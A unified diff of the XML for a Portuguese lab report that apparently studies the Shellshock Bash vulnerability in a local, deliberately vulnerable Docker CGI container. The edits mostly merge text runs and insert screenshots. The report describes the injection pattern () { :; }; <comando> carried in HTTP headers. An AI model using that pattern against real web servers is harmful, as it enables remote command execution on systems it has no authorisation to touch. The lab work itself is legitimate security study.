+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e permite que uma string com a forma () { :; }; &lt;comando&gt; presente numa variável de ambiente cause a execução de comandos arbitrários quando o Bash processa essa variável como uma definição de função. Num servidor Web que use CGI com Bash vulnerável, cabeçalhos HTTP (transformados em variáveis de ambiente HTTP_*) podem transportar o </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1232,7 +592,6 @@
         </w:rPr>
         <w:t>payload</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1264,20 +623,10 @@
       <w:pPr>
         <w:pStyle w:val="Head2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Preparação</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ambiente</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Preparação do ambiente</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1312,71 +661,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — devolve as variáveis de ambiente do processo CGI; útil para verificar como o servidor converte cabeçalhos e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>strings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> em variáveis.</w:t>
+        <w:t>/cgi-bin/getenv.cgi — devolve as variáveis de ambiente do processo CGI; útil para verificar como o servidor converte cabeçalhos e query strings em variáveis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1396,119 +681,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>vul.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — script que, apesar de conter apenas um </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>World</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">", é executado por um interpretador </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> intencionalmente vulnerável (este facto permite que o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> seja aproveitado antes das instruções do script CGI).</w:t>
+        <w:t>/cgi-bin/vul.cgi — script que, apesar de conter apenas um echo "Hello World", é executado por um interpretador bash intencionalmente vulnerável (este facto permite que o Shellshock seja aproveitado antes das instruções do script CGI).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1566,29 +739,13 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="en-GB" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> run -it -p 8080:80 --name shellshock </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> run -it -p 8080:80 --name shellshock jsimao/cs-shellshock-amd64</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="en-GB" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>jsimao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="en-GB" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/cs-shellshock-amd64</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="en-GB" w:eastAsia="en-US"/>
-        </w:rPr>
         <w:t>”</w:t>
       </w:r>
     </w:p>
@@ -1620,23 +777,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Antes de atacar, verificou-se que os scripts estão disponíveis e respondem </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>correctamente</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Antes de atacar, verificou-se que os scripts estão disponíveis e respondem correctamente.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1654,165 +795,209 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Requisição a /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> confirma que o CGI retorna variáveis de ambiente (ex.: HTTP_USER_AGENT, REQUEST_METHOD, QUERY_STRING). </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>saída</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>obtida</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>foi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>guardada</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>em</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> evidence_getenv.txt.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
+        <w:t xml:space="preserve">Requisição a /cgi-bin/getenv.cgi confirma que o CGI retorna variáveis de ambiente (ex.: HTTP_USER_AGENT, REQUEST_METHOD, QUERY_STRING). </w:t>
+      </w:r>
+      <w:r>
+        <w:t>A saída obtida foi guardada em evidence_getenv.txt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Excerto da resposta de /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mostrando variáveis de ambiente</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C1D9EFB" wp14:editId="41649B9E">
+            <wp:extent cx="5562600" cy="3359785"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1496993444" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1496993444" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5562600" cy="3359785"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Excerto da resposta de /cgi-bin/getenv.cgi mostrando variáveis de ambiente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1839,63 +1024,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Requisição simples a /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>-bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>vul.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> devolveu a resposta esperada </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>World</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, confirmando que o script está operacional (e inscrito no fluxo CGI). </w:t>
+        <w:t xml:space="preserve">Requisição simples a /cgi-bin/vul.cgi devolveu a resposta esperada Hello World, confirmando que o script está operacional (e inscrito no fluxo CGI). </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1907,106 +1036,102 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>resposta “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>World</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>do CGI vulnerável — confirmação de disponibilidade.</w:t>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D91A6B2" wp14:editId="0EE62A88">
+            <wp:extent cx="4692315" cy="1703910"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="424088140" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="424088140" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4732372" cy="1718456"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Resposta “Hello World do CGI vulnerável — confirmação de disponibilidade.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
